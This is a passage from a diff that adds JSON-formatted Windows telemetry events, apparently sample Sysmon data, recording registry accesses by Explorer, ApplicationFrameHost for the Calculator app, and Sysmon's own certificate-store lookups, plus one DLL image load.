"C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": 
"{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "CapabilityAccessManagerClient.dll", + "image_path": "C:\\Windows\\System32\\CapabilityAccessManagerClient.dll", + "pid": 4744, + "process_name": "explorer.exe", + "process_path": "C:\\Windows\\explorer.exe", + "timestamp": 131883573249950016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573250110000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + 
"timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250259984, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
